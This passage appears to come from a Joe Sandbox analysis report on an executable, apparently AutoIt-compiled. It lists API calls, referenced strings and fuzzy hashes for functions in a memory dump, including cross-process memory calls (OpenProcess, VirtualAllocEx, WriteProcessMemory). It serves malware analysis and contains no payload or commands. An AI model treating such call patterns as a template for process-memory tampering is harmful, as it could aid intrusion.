                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 2d9878dd9d24fe6d49e7fc045027fb936c8a2e4c5c91ea671785e659ed25def3
                                                  • Instruction ID: 8c5f2402f86b57236d27880f1ef6f2d82ee3989f530dc7e968149ac2ceb54991
                                                  • Opcode Fuzzy Hash: 2d9878dd9d24fe6d49e7fc045027fb936c8a2e4c5c91ea671785e659ed25def3
                                                  • Instruction Fuzzy Hash: 11F04475244304BFE7110FA5DC88FAF3BADFF87754B200029F545C6150CAA19947DA60
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C1C1F7
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C1C20E
                                                  • MessageBeep.USER32(00000000), ref: 00C1C226
                                                  • KillTimer.USER32(?,0000040A), ref: 00C1C242
                                                  • EndDialog.USER32(?,00000001), ref: 00C1C25C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 64afa2ad21f0b46c6e6521412b3978b390502456fcfb323f127c546a03f94de6
                                                  • Instruction ID: 0a38fdfd7c3adb8ba19c1938be7ca4066ae2d388aa759a34927d105a587f2bb0
                                                  • Opcode Fuzzy Hash: 64afa2ad21f0b46c6e6521412b3978b390502456fcfb323f127c546a03f94de6
                                                  • Instruction Fuzzy Hash: 9201D634444704ABEB205B64ED8EFDA77B8FF02B06F00026DF592A14E1DBF46985DB90
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00BC13BF
                                                  • StrokeAndFillPath.GDI32(?,?,00BFB888,00000000,?), ref: 00BC13DB
                                                  • SelectObject.GDI32(?,00000000), ref: 00BC13EE
                                                  • DeleteObject.GDI32 ref: 00BC1401
                                                  • StrokePath.GDI32(?), ref: 00BC141C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: 20f92558973406172df185cb370b1d23a4eab5fdf87fbae6442e37e2d33657bc
                                                  • Instruction ID: 1c8e09086e035df687be7982ff670709f85ec9303d0848fabbb0fca8fdb6ebe5
                                                  • Opcode Fuzzy Hash: 20f92558973406172df185cb370b1d23a4eab5fdf87fbae6442e37e2d33657bc
                                                  • Instruction Fuzzy Hash: F9F03C34040B48EBDB255F2AEC4CB5C3FE4FB42326F18826AE429581F2C7704996DF18
                                                  APIs
                                                    • Part of subcall function 00BE0DB6: std::exception::exception.LIBCMT ref: 00BE0DEC
                                                    • Part of subcall function 00BE0DB6: __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                    • Part of subcall function 00BC7A51: _memmove.LIBCMT ref: 00BC7AAB
                                                  • __swprintf.LIBCMT ref: 00BD2ECD
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BD2D66
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: 86d6467e7f51f751407a5be7cde3943fe0dfc92f527bcf709d98dba0307b697b
                                                  • Instruction ID: f64cd93ecf9c85ce18fdcf4e2a6b6a26cd6c5e6ea81d8e7936dba420431a7374
                                                  • Opcode Fuzzy Hash: 86d6467e7f51f751407a5be7cde3943fe0dfc92f527bcf709d98dba0307b697b
                                                  • Instruction Fuzzy Hash: F5915C71118241AFC714EF24C885D6FB7E4EF95710F0049AEF8969B2A1EB70EE44CB62
                                                  APIs
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                  • CoInitialize.OLE32(00000000), ref: 00C2B9BB
                                                  • CoCreateInstance.OLE32(00C52D6C,00000000,00000001,00C52BDC,?), ref: 00C2B9D4
                                                  • CoUninitialize.OLE32 ref: 00C2B9F1
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                  • String ID: .lnk
                                                  • API String ID: 2126378814-24824748
                                                  • Opcode ID: b7cb4511cbe641dfe53eba3bbf56bf74bddb7ddd7b331053339de7d549962ca6
                                                  • Instruction ID: 454621f9931e844e4f2924153f6604ef4e6f2c5d6dad51821a813de3486b3da8
                                                  • Opcode Fuzzy Hash: b7cb4511cbe641dfe53eba3bbf56bf74bddb7ddd7b331053339de7d549962ca6
                                                  • Instruction Fuzzy Hash: 4DA134756042159FCB00DF14C884E6ABBE5FF89314F14899CF8AA9B3A1CB31ED46CB91
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00BE50AD
                                                    • Part of subcall function 00BF00F0: __87except.LIBCMT ref: 00BF012B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: e787c5fcccb1d4366ca9a76b034dfc09ade530c03f949d8ee44863d2e9864157
                                                  • Instruction ID: 29b64213c599808c7158a74bdd8c1bcef82b4db37e336fb177fd6e59fad8d04c
                                                  • Opcode Fuzzy Hash: e787c5fcccb1d4366ca9a76b034dfc09ade530c03f949d8ee44863d2e9864157
                                                  • Instruction Fuzzy Hash: 3851772192C64A86DB217725CD4137E2BD0EB40704F208AD9F5D5972BBEF348ECC9A86
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: ea457a8f8ae9a5c042d1e2704ecb88527d1766230fbeb67e00c69475a15b73c6
                                                  • Instruction ID: a707b41ff6e70497fd2b82bd2be4bd302f082c0397e6f3cb7052f18d8ac49020
                                                  • Opcode Fuzzy Hash: ea457a8f8ae9a5c042d1e2704ecb88527d1766230fbeb67e00c69475a15b73c6
                                                  • Instruction Fuzzy Hash: 71516FB1900705DBDB24DF69C981BAAB7E4FF44314F2085AFE54ADB251E770EA94CB40
                                                  APIs
                                                    • Part of subcall function 00BC4F0B: __fread_nolock.LIBCMT ref: 00BC4F29
                                                  • _wcscmp.LIBCMT ref: 00C29824
                                                  • _wcscmp.LIBCMT ref: 00C29837
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: (l$FILE
                                                  • API String ID: 4029003684-2160188593
                                                  • Opcode ID: b59bd515074aff890d39cf9ace35fc714478d3c6c3d6ba5473efa356f28f1815
                                                  • Instruction ID: 495e78c4741197a1d1f8e1a44594a06faff02aa2af08889dcd79d7ec22d140a5
                                                  • Opcode Fuzzy Hash: b59bd515074aff890d39cf9ace35fc714478d3c6c3d6ba5473efa356f28f1815
                                                  • Instruction Fuzzy Hash: E841A671A0021ABADF219AA5DC46FEFBBFDEF85710F0044A9F904A7181DB719A04CB61
                                                  APIs
                                                    • Part of subcall function 00C214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C19296,?,?,00000034,00000800,?,00000034), ref: 00C214E6
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C1983F
                                                    • Part of subcall function 00C21487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C214B1
                                                    • Part of subcall function 00C213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C21409
                                                    • Part of subcall function 00C213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C1925A,00000034,?,?,00001004,00000000,00000000), ref: 00C21419
                                                    • Part of subcall function 00C213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C1925A,00000034,?,?,00001004,00000000,00000000), ref: 00C2142F
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C198AC
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C198F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: 89642da8f7fe8b47f694cd87536696f3b531dbb3663e6234f3875a343e01efcb
                                                  • Instruction ID: b98cf4b7f1ba76adca52c51ee0cdbce1d7c61e905580eaa8574a373d3d763a6e
                                                  • Opcode Fuzzy Hash: 89642da8f7fe8b47f694cd87536696f3b531dbb3663e6234f3875a343e01efcb
                                                  • Instruction Fuzzy Hash: B741507690111CBFDB10DFA4CC91ADEBBB8EB16300F044099F959B7191DA706F85DBA0
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C4F910,00000000,?,?,?,?), ref: 00C479DF
                                                  • GetWindowLongW.USER32 ref: 00C479FC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C47A0C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 6430de92ad307af1c8e1759270bcb8c5d4616cb85a0b7bf81e366cf7df03ca3f
                                                  • Instruction ID: b2dc95ae5e94bb25a5231b20f2f094c441f5c6b9c513e5c666367e7ea2091757
                                                  • Opcode Fuzzy Hash: 6430de92ad307af1c8e1759270bcb8c5d4616cb85a0b7bf81e366cf7df03ca3f
                                                  • Instruction Fuzzy Hash: E331BE31204206AFDB218F38DC45BEA77A9FB55324F248729F875A22E0D731EE519B50
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C47461
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C47475
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C47499
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: 6848040ecd14e114f6fb3f890617db213d313c1b61aa8fc146f74a1c0a48ccda
                                                  • Instruction ID: 2c6fb41dcb4551812d6bdc7903be8537735160d0c9da3ba6b8bb9da8dd6ed510
                                                  • Opcode Fuzzy Hash: 6848040ecd14e114f6fb3f890617db213d313c1b61aa8fc146f74a1c0a48ccda
                                                  • Instruction Fuzzy Hash: 8B219F32500218ABDF118E64CC46FEA3B79FB48724F111214FE156B190DBB5AC51DBA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C47C4A
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C47C58
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C47C5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: ab58982646c1dc00c0c711d10eb4e27de7b78d18de7adcd4ab891c98bf493175
                                                  • Instruction ID: 6985e1c822791ef405698dc68cd52cddff969018caf5e4bf287bb0f7e12015b1
                                                  • Opcode Fuzzy Hash: ab58982646c1dc00c0c711d10eb4e27de7b78d18de7adcd4ab891c98bf493175
                                                  • Instruction Fuzzy Hash: CF215EB5604208AFDB10DF28DCC1EAA37ECFF5A364B140559FA159B3A1CB71ED118B60
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C46D3B
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C46D4B
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C46D70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: 74281a2dd2ef3bdc3c2c9c398a4d707c054a02f0a1217c6fd2fee853ba01b4df
                                                  • Instruction ID: b8bf9a3feffe2bb4e036fd9b47fa6864c42d6aa8ea38a8c53965ad4c20eafa55
                                                  • Opcode Fuzzy Hash: 74281a2dd2ef3bdc3c2c9c398a4d707c054a02f0a1217c6fd2fee853ba01b4df
                                                  • Instruction Fuzzy Hash: 1721CF32610118BFEF118F54CC85FBB3BBAFF8A760F018128F9559B1A4CA719C519BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C47772
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C47787
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C47794
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: d34a74ce3b2f9fc3755a762092c842a4933c463b64e4fc100e9108b27070e076
                                                  • Instruction ID: 7950aea5a676beac8134c50aa9de8da9a8c11fed24fe7c75e2aafaecd295660f
                                                  • Opcode Fuzzy Hash: d34a74ce3b2f9fc3755a762092c842a4933c463b64e4fc100e9108b27070e076
                                                  • Instruction Fuzzy Hash: C4112372240208BBEF215F65CC01FEB77A8FF89B64F014228FA55A2090C772E811CB20
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4B83,?), ref: 00BC4C44
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BC4C56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 9c268e8e818e3507b9298d74f45a4e7065ddabb99edf8a47706e337a120eb16d
                                                  • Instruction ID: d49a6ecaac193df5f23074baae929dd70311e918b28a13b847e2662805a2bdc6
                                                  • Opcode Fuzzy Hash: 9c268e8e818e3507b9298d74f45a4e7065ddabb99edf8a47706e337a120eb16d
                                                  • Instruction Fuzzy Hash: B3D0E275910712CFD7209F31D918B0A76E4EF06391B11887E98A6D6160E7B0D880DA50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4BD0,?,00BC4DEF,?,(l,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4C11
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BC4C23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: 4bb75fd3da758c763d83544b7818f9d21ad704d127e5c825f9862013789cc962
                                                  • Instruction ID: 3b9535aa3862e5b6b3a66913eab94f88cec283a14717363975573c5683b44904
                                                  • Opcode Fuzzy Hash: 4bb75fd3da758c763d83544b7818f9d21ad704d127e5c825f9862013789cc962
                                                  • Instruction Fuzzy Hash: 4CD0E275911712CFD720AF75D918B0BBAE5EF0A392B11C87E9886D6160E7B0D881CA50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00C41039), ref: 00C40DF5
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C40E07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C38CF4,?,00C4F910), ref: 00C390EE
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C39100
                                                  Strings
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: LocalTime__swprintf
                                                  • String ID: %.3d$WIN_XPe
                                                  • API String ID: 2070861257-2409531811
                                                  Similarity
                                                  • API ID:
